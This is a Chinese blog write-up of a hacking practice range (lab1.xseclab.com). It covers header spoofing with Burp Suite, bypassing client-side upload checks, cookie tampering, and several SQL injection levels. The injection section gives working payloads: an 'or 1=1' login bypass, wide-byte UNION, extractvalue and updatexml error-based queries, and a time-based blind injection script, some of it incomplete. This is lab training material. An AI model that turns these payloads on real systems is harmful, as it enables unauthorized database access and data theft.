网络安全实验是靶场总结

作者: hxf981224 分类: 未分类 发布时间: 2019-10-15 17:03

一基础关

三base65 解密

 Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVmpBeFYySkVUbGhoTVVwVVZtcEJlRll5U2tWVWJHaG9UVlZ3VlZacVFtRlRNbEpJVm10a1dHSkdjRTlaVjNSR1pVWmFkR05GU214U2JHdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbUZrUjA1R1drWndWMDFFUlRGV1ZFb3dWakZhV0ZOcmFHaFNlbXhXVm1wT1QwMHhjRlpYYlhSWFRWaENSbFpYZUZOVWJVWTJVbFJDVjAxdVVuWlZha1pYWkVaT2NscEdhR2xTTW1ob1YxWlNTMkl4U2tkWGJHUllZbFZhY1ZadGRHRk5SbFowWlVaT1ZXSlZXVEpWYkZKSFZqRmFSbUl6WkZkaGExcG9WakJhVDJOdFJraGhSazVzWWxob1dGWnRNWGRVTVZGM1RVaG9hbEpzY0ZsWmJGWmhZMnhXY1ZGVVJsTk5XRUpIVmpKNFQxWlhTa2RqUm14aFUwaENTRlpxUm1GU2JVbDZXa1prYUdFeGNHOVdha0poVkRKT2RGSnJhR2hTYXpWeldXeG9iMWRHV25STldHUlZUVlpHTTFSVmFHOWhiRXB6WTBac1dtSkdXbWhaTVZwaFpFZFNTRkpyTlZOaVJtOTNWMnhXYjJFeFdYZE5WVlpUWVRGd1YxbHJXa3RUUmxweFVtMUdVMkpWYkRaWGExcHJZVWRGZUdOSE9WZGhhMHBvVmtSS1QyUkdTbkpoUjJoVFlYcFdlbGRYZUc5aU1XUkhWMjVTVGxOSFVuTlZha0p6VGtaVmVXUkhkRmhTTUhCSlZsZDRjMWR0U2tkWGJXaGFUVzVvV0ZsNlJsZGpiSEJIV2tkc1UySnJTbUZXTW5oWFdWWlJlRmRzYUZSaVJuQlpWbXRXZDFZeGJISlhhM1JVVW14d2VGVXlkR0ZpUmxwelYyeHdXR0V4Y0hKWlZXUkdaVWRPUjJKR2FHaE5WbkJ2Vm10U1MxUnRWa2RqUld4VllsZG9WRlJYTlc5V1ZscEhXVE5vYVUxWFVucFdNV2h2VjBkS1dWVnJPVlpoYTFwSVZHeGFZVmRGTlZaUFYyaHBVbGhCZDFac1pEUmpNV1IwVTJ0b2FGSnNTbGhVVlZwM1ZrWmFjVk5yWkZOaVJrcDZWa2N4YzFVeVNuSlRiVVpYVFc1b1dGZFdXbEpsUm1SellVWlNhVkp1UWxwV2JYUlhaREZaZUdKSVNsaGhNMUpVVlcxNGQyVkdWbGRoUnpsb1RWWndlbFl5Y0VkV01ERjFZVWhLV2xaWFVrZGFWM2hIWTIxS1IyRkdhRlJTVlhCS1ZtMTBVMU14VlhoWFdHaFlZbXhhVjFsc1pHOVdSbXhaWTBaa2JHSkhVbGxhVldNMVlWVXhXRlZyYUZkTmFsWlVWa2Q0YTFOR1ZuTlhiRlpYWWtoQ1NWWkdVa2RWTVZwMFVtdG9VRll5YUhCVmJHaERUbXhrVlZGdFJtcE5WMUl3VlRKMGIyRkdTbk5UYkdoVlZsWndNMVpyV21GalZrNXlXa1pPYVZKcmNEWldhMk40WXpGVmVWTnVTbFJpVlZwWVZGYzFiMWRHWkZkWGJFcHNVbTFTZWxsVldsTmhWa3AxVVd4d1YySllVbGhhUkVaYVpVZEtTVk5zYUdoTk1VcFZWbGN4TkdReVZrZFdXR3hyVWpOU2IxbHNWbmRXTVZwMFkwZEdXR0pHY0ZoWk1HUnZWMnhhV0ZWclpHRldWMUpRVlRCVk5WWXhjRWhoUjJoT1UwVktNbFp0TVRCVk1VMTRWVmhzVm1FeVVsWlpiWFIzWVVaV2RHVkZkR3BTYkhCNFZrY3dOVll4V25OalJXaFlWa1UxZGxsV1ZYaFhSbFoxWTBaa1RsWXlhREpXTVZwaFV6RkplRlJ1VmxKaVJscFlWRlJHUzA1c1drZFZhMlJXVFZad01GVnRkRzlWUmxwMFlVWlNWVlpYYUVSVk1uaGhZekZ3UlZWdGNFNVdNVWwzVmxSS01HRXhaRWhUYkdob1VqQmFWbFp1Y0Zka2JGbDNWMjVLYkZKdFVubGFSV1IzWVZaYWNtTkZiRmRpUjFFd1ZrUktSMVl4VGxsalJuQk9UVzFvV1ZkV1VrZGtNa1pIVjJ4V1UySkdjSE5WYlRGVFRWWlZlV042UmxoU2EzQmFWVmMxYjFZeFdYcGhTRXBWWVRKU1NGVnFSbUZYVm5CSVlVWk9WMVpHV2xaV2JHTjRUa2RSZVZaclpGZGlSMUp2Vlc1d2MySXhVbGRYYm1Sc1lrWnNOVmt3Vm10V01ERkZVbXBHV2xaWGFFeFdNbmhoVjBaV2NscEhSbGROTW1oSlYxUkplRk14U1hoalJXUmhVbFJXVDFWc2FFTlRNVnAwVFZSQ1ZrMVZNVFJXYkdodlYwWmtTR0ZHYkZwaVdHaG9WbTE0YzJOc2NFaFBWM0JUWWtoQ05GWnJZM2RPVmxsNFYyNVNWbUpIYUZoV2FrNU9UVlphV0dNemFGaFNiRnA1V1ZWYWExUnRSbk5YYkZaWFlUSlJNRmRXV2t0ak1WSjFWRzFvVTJKR2NGbFhWM2hoVW0xUmVGZHVSbEppVlZwaFZtMHhVMU5XV2xoa1J6bG9UVlZ3TUZsVldsTldWbHBZWVVWU1ZrMXVhR2haZWtaM1VsWldkR05GTlZkTlZXd3pWbXhTUzAxSFNYbFNhMlJVWW1zMVZWbHJaRzlXYkZwMFpVaGtUazFXYkROV01qVkxZa1pLZEZWdWJHRlNWMUl6V1ZaYVlXTnRUa1ppUm1ScFVqRkZkMWRXVWt0U01WbDRWRzVXVm1KRlNsaFZiRkpYVjFaYVIxbDZSbWxOVjFKSVdXdG9SMVpIUlhoalNFNVdZbFJHVkZZeWVHdGpiRnBWVW14a1RsWnVRalpYVkVKaFZqRmtSMWRZY0ZaaWEzQllWbXRXWVdWc1duRlNiR1JxVFZkU2VsbFZaSE5XTVZwMVVXeEdWMkV4Y0doWFZtUlNaVlphY2xwR1pGaFNNMmg1VmxkMFYxTXhaRWRWYkdSWVltMVNjMVp0TVRCTk1WbDVUbGQwV0ZKcmJETldiWEJUVjJzeFIxTnNRbGROYWtaSFdsWmFWMk5zY0VoU2JHUk9UVzFvU2xZeFVrcGxSazE0VTFob2FsSlhhSEJWYlRGdlZrWmFjMkZGVGxSTlZuQXdWRlpTUTFack1WWk5WRkpYWWtkb2RsWXdXbXRUUjBaSFlrWndhVmRIYUc5V2JYQkhZekpOZUdORmFGQldiVkpVV1d4b2IxbFdaRlZSYlVab1RXdHdTVlV5ZEc5V2JVcElaVWRvVjJKSFVrOVVWbHB6VmpGYVdXRkdhRk5pUm5BMVYxWldZV0V4VW5SU2JrNVlZa1phV0ZsVVNsSk5SbFkyVW10MGFrMVlRa3BXYlhoVFlWWktjMk5HYkZoV00xSm9Xa1JCTVdNeFpISmhSM2hUVFVad2FGWnRNSGhWTVVsNFZXNU9XR0pWV2xkVmJYaHpUbFpzVm1GRlRsZGlWWEJKV1ZWV1QxbFdTa1pYYldoYVpXdGFNMVZzV2xka1IwNUdUbFprVGxaWGQzcFdiWGhUVXpBeFNGTlliRk5oTWxKVldXMXpNVlpXYkhKYVJ6bFhZa1p3ZWxZeU5XdFVhekZYWTBoc1YwMXFSa2haVjNoaFkyMU9SVkZ0UmxOV01VWXpWbTF3UzFNeVRuTlVia3BxVW0xb2NGVnRlSGRsVm1SWlkwVmtWMkpXV2xoV1J6VlBZVlpLZFZGck9WVldla1oyVmpGYWExWXhWbkphUjNST1lURndTVlpxU2pSV01WVjVVMnRrYWxORk5WZFpiRkpIVmtaU1YxZHNXbXhXTURReVZXMTRhMVJzV25WUmFscFlWa1ZLYUZacVJtdFNNV1IxVkd4U2FFMXRhRzlXVjNSWFdWZE9jMVp1UmxSaE0xSlZWbTE0UzAxR2JGWlhhemxYVFZad1NGWXljRXRXTWtwSVZHcFNWV0V5VWxOYVZscGhZMnh3UjFwR2FGTk5NbWcxVm14a2QxUXhWWGxUV0docFUwVTFXRmx0TVZOWFJsSlhWMjVrVGxKdGRETlhhMVpyVjBaSmQyTkZhRnBOUm5CMlZqSnplRk5HVm5WWGJHUk9ZbTFvYjFacVFtRldNazV6WTBWb1UySkhVbGhVVmxaM1ZXeGFjMVZyVG1oTlZXdzBWVEZvYzFVeVJYbGhTRUpXWWxoTmVGa3dXbk5XVmtaMVdrVTFhVkp1UVhkV1JscFRVVEZhY2sxV1drNVdSa3BZVm01d1YxWkdXbkZUYTFwc1ZteGFNVlZ0ZUdGaFZrbDRVbGhrVjJKVVJUQlpla3BPWlVkT1JtRkdRbGRpVmtwVlYxZDBWMlF4WkhOWGEyaHNVak5DVUZadGVITk9SbGw1VGxaT1YySlZjRWxaVlZwdlZqSkdjazVWT1ZWV2JIQm9WakJrVG1WdFJrZGhSazVwVW01Qk1sWXhXbGRaVjBWNFZXNU9XRmRIZUc5VmExWjNWMFpTVjFkdVpHaFNiRmt5VlcxME1HRnJNVmRUYWtaWFZqTm9VRmxXV2twbFJrNTFXa1prYUdFd2NGaFdSbFpXWlVaSmVGcElTbWhTTTFKVVZGVmFkMlJzV2tkYVNIQk9WakZhZWxZeGFITlVNVnB5VGxjNVZWWnNXak5VVlZwaFYwVTFWbFJzWkU1aE0wSktWMVpXVjFVeFdsaFRiR3hvVWpKb1dGbHJXbmRWUmxwelYydDBhazFXY0hsVWJGcHJZVmRGZDFkWWNGZGlXR2h4V2tSQmVGWXhVbGxoUm1ob1RXMW9WbGRYZEd0aU1rbDRWbTVHVW1KVldsaFphMXAzVFVad1ZtRkhkRlZoZWtaYVZWZDRjMWxXV2xoaFJYaGFZVEZ3WVZwVldtdGpiVTVIWVVkb1RsZEZTbEpXYlRGM1V6RktkRlpyYUZWaE1WcFlXV3RrVTFaR1ZuTlhibVJzVm0xU1dsa3dWbXRXTWtwWFVtcE9WVlpzV25wWlZscEtaVmRHUjFWc2NHbFNNbWd5Vm1wR1lXRXhaRWhXYTJoUVZtdHdUMVpzVWtaTlJtUlZVVzFHV2xac2JEUlhhMVp2WVVaS2MxTnNXbGRpVkVaVVZtdGFkMWRIVmtsVWJHUnBVakZLTmxaclkzaGlNVmw1VWxod1VsZEhhRmhXYlRGU1RVWndSVkpzY0d4V2F6VjZXV3RhWVdGV1NYbGhSemxYVmpOU1dGZFdaRTlqTVZwMVVteFNhRTB4U2xaV2JURjZUVlV4UjFadVVteFNWR3h3VldwQ2QxZHNiRlpWYkU1WFRVUkdXVlpXYUd0WFJscDBWV3hPWVZac2NHaFpNbmgzVWpGd1IyRkdUazVOYldjeFZtMTRhMlF4UlhoaVJtaFZZVEpTV0ZsdGVFdGpNVlYzV2taT2FrMVhlSGxXTWpWUFZERmFkVkZzWkZwV1YxRjNWakJhUzJOdFNrVlViR1JwVjBWS1ZWWnFTbnBsUmtsNFZHNU9VbUpIVWs5WlYzUmhVMFprYzFkdFJsZE5helY2V1RCV2IxVXlTa2hWYXpsVlZucEdkbFV5ZUZwbFJsWnlZMGQ0VTJGNlJUQldWRVp2WWpKR2MxTnNhRlppVjJoWFdXdGFTMWRHV2tWU2JHUnFUV3RhUjFaSGVGTlViRnAxVVZoa1YxSnNjRlJWVkVaaFkyc3hWMWRyTlZkU2EzQlpWMWQwYTJJeVVuTlhXR1JZWWxoU1ZWVnFRbUZUVm14V1YyMUdWV0pGY0RGVlZ6QTFWakpLVlZKVVFscGxhM0JRV1hwR2QxTldUblJrUms1T1RVVndWbFl4WkRCaU1VVjNUbFZrV0dKcmNHRlVWRXBUVlVaYWRHVklUazlTYkd3MVZHeFZOV0ZIU2taalJteGFWbFp3ZWxacVNrWmxSbHBaWVVkR1UwMHlhRFpXYlhCSFdWWmtXRkpyWkdoU2F6VndWVzAxUWsxc1dYaFhiR1JhVmpCV05GWlhOVTlYUm1SSVpVYzVWbUV4V2pOV01GcFRWakZrZFZwSGFGTmlSbXQ1VmxjeE1FMUhSbkpOVm1SVVlXdGFXRlpxVG05U1JscHhVMnQwVTAxck5VaFphMXB2VmpBd2VGTnFTbGRXYkVwSVZsUkdXbVZIVGtaaVJsWnBVakpvZDFadGVHRmtNV1JIVjJ0a1dHSlZXbkZVVlZKWFUwWlplR0ZJVGxWTlZuQjVWR3hqTlZaV1duTlhibkJWWWtad2VsWnRNVWRTYkZKeldrZHNWMWRGU2t0V01WcFhWakZWZUZkWVpFNVdiVkp4VldwS2IxbFdVbGRYYm1SV1VtMTBORll5ZUd0aGF6RllWVzVzVldKR2NISldSM2hoVjBkUmVtTkdaR2xYUjJoVlZsaHdRbVZHVGtkVWJHeHBVbXMxYjFSWGVFdFdiR1JZVFZod1RsWnNjRmhaYTJoTFdWWktObUpHYUZwaE1YQXpXbGQ0V21WVk5WaGtSbFpvWld0YVdsZHNWbUZoTVZsM1RWaEdWMkpyY0ZoV2ExWjNWRVpWZUZkclpHcGlWVnBJVjJ0YVQxUnJNWFJoUmxwWFlsUkdNMVY2Ums1bFZsSjFWR3hXYVdFelFuWldWekI0VlRGYVIxVnNWbFJpVkd4d1ZGWmFkMlZXV2xoa1JFSldUVVJHV1ZaWGRHOVdhekYxWVVod1dGWnNjRXRhVjNoSFl6RldjMXBIYUdobGJGbDVWbTF3UjFsWFJYaGFSV2hYWVRKb1VWWnRkSGRVTVZwMFpFaGtWRlp0VWxaVlZ6RkhZVlV4Y2xkcVFsZGlWRlpNVmpCa1MxTkhWa2RhUm5CcFVqSm9WVlpHVWtka01WbDRXa2hTYTFJelFuQlZha1pLWkRGYVJWSnRkR2xOVm13elZGWldhMkZGTUhsbFJtaGFZa1pLUTFwVlduTmpWa3B6WTBkNFUySldTalZXYWtvMFZUSkdXRk5yYkZKaVIyaFlXV3hvVTFkR1pGZGFSbVJxVFZkU01WVnRlRTloVmtsNFUyNW9WMUpzY0hKV1ZFcFhZekpLUjFkdFJsUlNWRloyVm0weE5HUXlWbGRoTTJSV1lsVmFXRlJWVWtkWFZscFhZVWQwV0ZKc2NEQldWM2hQV1ZaYWMyTkhhRnBOYm1nelZXcEdkMUl5UmtkVWF6Vk9ZbGRqZUZadE1UUmhNREZIVjFob1ZWZEhhR2hWYkdSVFZqRnNjbHBHVGxoV2JYZ3dWRlphVDJGck1WZGpSRUpoVmxkb1VGWkVSbUZrVmtaeldrWndWMVl4UmpOV2FrSmhVMjFSZVZScldtaFNia0pQVlcwMVEwMXNXbkZUYm5Cc1VtczFTVlZ0ZEdGaVJrcDBWV3M1V21KVVJuWlpha1poWTFaR2RGSnNaRTVoZWxZMlYxUkNWMkl4VlhsVGEyaFdZa2RvVmxadGVHRk5NVnBZWlVkR2FrMVdXbmxXUjNocllVZFdjMWRzYkZkaGExcDJXV3BLUjJNeFRuTmhSMmhUWlcxNFdGZFdaREJrTWxKelYydFdVMkpHY0hKVVZscDNaVlp3UmxaVVJtaFdhM0F4VlZab2ExZEhTa2RYYmtaVllrZFNSMXBFUVhoV01XUnlUbFprVTJFelFscFdiVEIzWlVkSmVWVnVUbGhYUjFKWldXeG9VMVpXVm5GUmJVWlVZa1phTUZwVlpFZGhSbHB5WWtSU1ZtSkhhSEpXYWtwTFZsWktWVkZzY0d4aE0wSlFWMnhXWVdFeVVsZFdiazVWWWxkNFZGUldWbmRXYkZsNFdrUkNWMDFzUmpSWGEyaFBWMGRGZVdGSVRsWmhhelZFVmxWYVlXUkZNVmRVYkZKVFlrZDNNVlpIZUZaT1YwWklVMnRhYWxKRlNtaFdiR1JUVTBaYWMxZHRSbGROYXpWSVYydGFWMVl5U2tsUmFscFhZbGhDU0ZkV1dtdFhSa3B5WVVkd1UwMXVhRmxXYWtKWFV6Rk9SMWR1VW14U00xSlFWV3BDVjA1R1dsaE9WazVXVFd0d2VWUnNXbk5YYlVWNFkwZG9WMDFXY0doYVJWVjRWakZPY2s1V1RtbFNiWFExVm14amQyVkdTWGxTYmxKVFlXeHdXRmxyWkc5WlZteFZVbTVrVlZKdGVGaFdNblF3WVdzeGNrNVZhRnBoTVhCMlZtcEJkMlZHVG5SUFZtaG9UVlZ3U1ZkV1VrZFhiVlpIWTBWc1ZHSlhhRlJVVkVaTFZsWmFSMVp0Um10TlYxSllWakowYTFsV1RrbFJiazVXWWtaS1dGWXdXbUZrUlRWWFZHMW9UbFpYT0hsWFYzUmhZVEZhZEZOc2JHaFRTRUpXV1d0YWQyVnNXblJOVldSVFlrWktlbGRyWkhOV01XUkdVMnQwVjAxV2NGaFdha1pXWlVaa1dWcEZOVmRpVmtwNFZsZHdTMkl4YkZkVmJHUllZbTFTVjFWdE1UQk9SbGw1WlVkMGFHRjZSbGxXVnpWelZsZEtSMk5JU2xkU00yaG9WakJrVW1WdFRrZGFSMnhZVWpKb1ZsWnNhSGRSYlZaSFZHdGtWR0pIZUc5VmFrSmhWa1phY1ZOdE9WZGlSMUpaV2tWa01HRlZNWEppUkZKWFlsUldWRlpIZUdGT2JVcElVbXhrYVZkSFozcFhiRnBoV1ZkU1JrMVdXbUZTYkZwdldsZDBZVmRzWkhOV2JVWm9UVlpzTTFSV2FFZFdNa3B5WTBab1YyRXhXak5XUlZwV1pVWmtjbHBIY0dsV1ZuQkpWakowWVZReFVuSk5XRkpvVW14d1dGbHNVa2ROTVZZMlVtczFiRlpzU2pGV1IzaFhZVmRGZWxGdWFGZFdla0kwV1dwS1QxSXhXblZWYlhoVVVqRktkMVpHV210Vk1XUkhWMnhvYTFKRlNsZFVWVkpIVjBac2NsVnNUbGROVld3MldWVm9kMWRzV1hwaFJYaGhVbXh3U0ZreWN6VldNVnB6V2tkNGFFMVhPVFZXYlRGM1VqRnNWMkpHWkZSWFIyaHdWV3RhZDFaR2JITmFSRkpWVFZad2VGVnRkREJXUmxwelkwaG9WazFXU2toV1ZFRjRWakZhY1Zac1drNWliRXB2VjFaa05GUXhTbkpPVm1SaFVtNUNjRlZ0ZEhkVFZscDBaRWRHV0dKV1dsbFdiWFJ2WVRGSmVsRnVRbFppVkZaRVZtcEdZVmRGTVZWVmJXeE9WbXhaTVZaWGVHOWtNVlowVTJ4YVdHSkhhRmhaYkZKSFZURlNWbGR1VGs5aVJYQXdXa1ZhVDFSc1dYaFRXR2hYWWtkUk1GZFdaRWRUUms1eVlrWkthVkl4U2xsWFYzaFRVbXN4UjJORlZsUmlSMUp4VkZaa1UwMVdWblJsUlRsb1ZtdHNORlV5Tlc5V01VcHpZMGhLVjFaRmNGaFpla3BMVWpGa2RGSnNVbE5XUmxveVZtMHdlRTVIVVhsV2JHUm9UVEpTV1ZsdE1WTlhSbEpZWkVoa1ZGWnNjRWxaTUZwUFZqRlpkMVpxVmxkV00yaFFWMVphWVdNeVRraGhSbkJPWW0xbmVsWlhjRWRrTVU1SVUydG9hVkpyTlZsVmJGWjNWVEZhZEUxSVpHeFNWRlpKVld4b2IxWXhaRWhoUjJoV1lrZFNWRlpxUm5OamJHUjFXa1prVGxZemFGZFdWRW8wVkRKR2NrMVdaR3BTUlVwb1ZteGFXbVF4YkhKYVJYUlRUV3MxUmxWWGVGZFdNVnB5WTBac1YySllRa05hVlZwTFZqRk9kVlJ0UmxOaWEwcDNWMWN4TUZNeFVsZFhibEpPVTBkb1ZWUldaRk5YUmxwMFRsWmtXRkl3Y0VsV1Z6QTFWMnhhUmxkcVRscGhhMXBvVmpCVmVGWldWblJoUlRWb1pXeFdNMVp0TUhoTlIwVjRZa1prVkZkSGVHOVZibkJ6Vm14YWNsWnJkRlZTYkhCWldsVmtSMkZyTVZoa1JGcGFWbFpWTVZaVVNrdFhWMFpIWTBaa2FFMVlRakpYVjNCTFVqSk5lRlJ1VG1oU01taFZWV3hXZDFkR1pGaGxSemxWWWxaYVNGWXlkRmRWTWtwV1YyNUdWVlp0VWxSYVYzaHlaREZ3UlZWdGFGZGhNMEY0VmxaYWIyRXhaRWhUYTJSWVltdHdWMWxYZEdGaFJtdDVZek5vVjAxWFVqQlphMXBQVlRKRmVsRnRPVmROVm5CVVZXcEtVbVZXVW5WVWJHaFlVakZLYjFaWGVHOVZNazVYWWtoT1YxWkZXbFJVVmxwSFRrWlplVTFVUW1oU2JIQXdWbGQwYzFkSFJuSk9WRTVYWVd0d1NGa3llRTlrUjBaSFkwZDRhRTFZUWpWV2JYQkRXVlpWZVZSdVRtcFNWMmhVV1d0Vk1XTkdXblJrU0dSWFlrWnNORmRyVWtOWGJGbDRVbXBPVldKR2NISldNR1JMWXpGT2NrOVdaR2hOVm5CTlZqRmFZVmxYVWtoV2ExcGhVbFJzVkZscmFFSmtNV1J6Vm0xR2FFMVdjRmxWTW5SaFlXeEtXR1ZIUmxWV1JUVkVXbFphVjFJeFNsVmlSa1pXVmtSQk5RPT0=

脚本:

 import base64
 code = "解密内容"
 count = 0
 try:
 ​
      while True:
         code = base64.b64decode(code)
         count += 1
 except Exception:
     print (count, code)
 ​

四题据说MD5加密很安全,真的是么?

e0960851294d7b2253978ba858e24633

MD5解密为bighp

五题种族歧视

url:http://lab1.xseclab.com/base1_0ef337f3afbe42d5619d7a36c19c20ab/index.php

burp suite:拦截修改language

六题:HAHA浏览器

据说信息安全小组最近出了一款新的浏览器,叫HAHA浏览器,有些题目必须通过HAHA浏览器才能答对。小明同学坚决不要装HAHA浏览器,怕有后门,但是如何才能过这个需要安装HAHA浏览器才能过的题目呢?

url:http://lab1.xseclab.com/base6_6082c908819e105c378eb93b6631c4d3/index.php

burp suite 拦截:修改user-agent

七题key究竟在哪里呢?

上一次小明同学轻松找到了key,感觉这么简单的题目多无聊,于是有了找key的加强版,那么key这次会藏在哪里呢?

url:

http://lab1.xseclab.com/base7_eb68bd2f0d762faf70c89799b3c1cc52/index.php

burp suite拦截:发送到repeater模块点go 看raw

八 key又找不到了

设置burp suite 拦截:发送到repeater 点击go 看raw 下有 search_key.php

url:http://lab1.xseclab.com/base8_0abd63aa54bef0464289d6a42465f354/key_is_here_now_.php

九题冒充登陆用户

打开burp suite 设置拦截 发送带repeater 模块修改cookie login=1

得到key:

十题比较数字大小

只要比服务器上的数字大就可以了! 在搜索框内输入一串字符 发现最多输入三位所以修改maxlength

再输入一个5位数以上的数就显示flag了

十二题就不让你访问

查看robots.txt文件

访问url:http://lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b//9fb97531fe95594603aff7e794ab2f5f/login.php

上传关

一题请上传一张jpg格式的图片

解题地址:http://lab1.xseclab.com/upload1_a4daf6890f1166fd88f386f098b182af/

右击查看页面源代码

 <html>
  <head>
  <meta http-equiv=Content-Type content="text/html;charset=utf-8">
  <title>upload 1</title>
  <script>
  function check(){
  var filename=document.getElementById("file");
  var str=filename.value.split(".");
  var ext=str[str.length-1];
  if(ext=='jpg'){
  return true;
  }else{
  alert("请上传一张JPG格式的图片!")
  return false;
  }
  return false;
  }
  </script>
  </head>
  <body>
  请上传一张JPG格式的图片!
  <form action="upload_file.php" method="post" enctype="multipart/form-data" onsubmit="return check()">
  <label for="file">文件名</label>
  <input type="file" name="file" id="file" />
  <br />
  <input type="submit" name="submit" value="上传" />
  </form>
  </body>
 </html>

前端检测 设置brp suite拦截 修改上传类型

1 上传jpg文件,拦截

弹出 flag:

二题

 ​ 解题跟第一题一样 

三题

源码

 <html>
  <head>
  <meta http-equiv=Content-Type content="text/html;charset=utf-8">
  <title>upload 1</title>
  <script>
  function check(){
  var filename=document.getElementById("file");
  var str=filename.value.split(".");//以点为分割线,分割为数组
  var ext=str[1];//去第二个元素
  if(ext==='jpg'){
  return true;
  }else{
  alert("请上传一张JPG格式的图片!");
  return false;
  }
  return false;
  }
  </script>
  </head>
  <body>
  请上传一张JPG格式的图片!
  <form action="upload_file.php" method="post" enctype="multipart/form-data" onsubmit="return check()">
  <label for="file">文件名</label>
  <input type="file" name="file" id="file" />
  <br />
  <input type="submit" name="submit" value="上传" />
  </form>
  </body>
 </html>
 ​

所以打开burp suite 设置拦截

上传jpg.后缀文件拦截

注入关

一题最简单的SQL注入

题目地址:url=http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php

万能密码绕过 admin’ or1=1# 没有什么过滤

二题最简单的SQL注入(熟悉注入环境)

题目url:http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php

查看页面源代码有提示 id=1

构造payload id=1 or 1=1

三题防注入(宽字节注入)

url:http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php

源码:

 <html>
     <head>
         <title>SQLi4_article</title>
     </head>
     <body>      <div>
             <h2>blog system</h2>
             <div class="content">my blog test</div>
         </div>
                 
     </body>
 </html>
 <!-- tips: id=1

payload:id=1%df’%23

1:注出数据库名

 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df'union select 1,2,database()%23

2:注出表名

 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

3:注出列名

 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df'union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7361655f757365725f73716c6934%23

4注出数据库内容

 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df'union select 1,group_concat(id,title_1,content_1),3 from sae_user_sqli4%23

四题到底能不能回显(limit限制)

url:http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1

1:注入出数据名

 ​

2:注入出表名

 http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(table_name)from information_schema.tables where table_schema=database()))),1)%23&num=1

3注入出列名

 http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(column_name)from information_schema.columns where table_name=0x75736572))),1)%23&num=1

4:注入出数据库内容//有限制,每次只能查询一个字段

 http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(table_name)from information_schema.tables where table_schema=database()))),1)%23&num=1

五题邂逅(图片报头宽字节注入)

url:http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/

访问图片网址: burp suite拦截:在报头进行注入

六题ErrorBased (报错注入)

url:http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin

payload:username=admin’ %23

1:注入出数据库名

 ​

2:注入出表名:

 ?username=admin' and (select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1))%23

3:注入出字段名

 ?username=admin' and (select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='motto'),0x7e),1))%23

4:注入出数据库内容

 ​

七题盲注

测试代码

 http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and (sleep(5))%23

脚本

 # coding=utf-8
 import requests
 ​
 db_len = 0
 url = 'http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin'
 #测试数据库长度
 while True:
    db_len += 1
    payload = url + "'"+"and if(length(database())>{0},1,sleep(3))%23".format(db_len)
    print(payload)
    start_time = time.time()
    res = requests.get(payload).text
    #print(url_req)
    stop_time = time.time()
    if( (stop_time - start_time) > 2.5):
        break
 ​
 print("database_length",db_len)
 ​
 ​
 #猜解数据库名
 db_name =""
 for i in range(8):
    for c in range(32,127):
        payload = url + "'" +"and if(ascii(substr(database(),{0},1))>{1},1,sleep(3))%23".format(i+1,str(c))
        print(payload)
        start_time = time.time()
        res = requests.get(payload).text
        stop_time = time.time()
        if ((stop_time - start_time) > 2.5):
            db_name += chr(c)
            print(db_name)
            break
 ​

八题:SQL注入通用防护

分值: 250

小明写了一个博客系统,为了防注入,他上网找了一个SQL注入通用防护模块,GET/POST都过滤了哦!

url:http://lab1.xseclab.com/sqli8_f4af04563c22b18b51d9142ab0bfb13d/index.php?id=1

刚开始做的时候无从下手,不过看了大佬的wp,知道可以用sqlmap来寻找注入点,可以找到实在cookie中:

脚本关

一题key又又找不到了

url:http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php

查看页面源代码

 ​
 <html>
     <head>
         <meta http-equiv="content-type" content="text/html;charset=utf-8">
     </head>
     <body>
         <a href="./search_key.php">_到这里找key__</a>
     </body>
 </html>

发现有search.php 代开发现没有key,所以简单写一个脚本

 import  requests
 url="http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/search_key.php"
 ​
 req = requests.get(url).text
 print(req)

运行脚本发货key

二题:快速口算

url:http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php

发现题目要求两秒钟算出平提交所以只能写脚本了

页面源代码:

 ​
 <html>
     <head>
         <meta http-equiv=Content-Type content="text/html;charset=utf-8">
     </head>
     <body>
       
         <form action="" method="post">
             请在2秒内口算结果并提交!<br/>
             2828*38414+1564*(2828+38414)=<input type="text" name="v"/>
             <input type="submit" value="提交"/>
         </form>
     </body>
 </html>
 ​

脚本:

 import requests
 import re
 url = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"
 s = requests.session()
 ​
 r = s.get(url)
 red = str(re.findall('(.*?)=<input type="text" name="v"/>',r.text))//爬去计算题目
 red = red[14:]
 red = red[:-2]
 ​
 key = eval (red)
 print(red)
 print(key)
 data = {"v":key}
 a = s.post(url,data=data).content.decode('utf-8')
 print(a)

运行脚本即可返回key

三题这个题目是空的

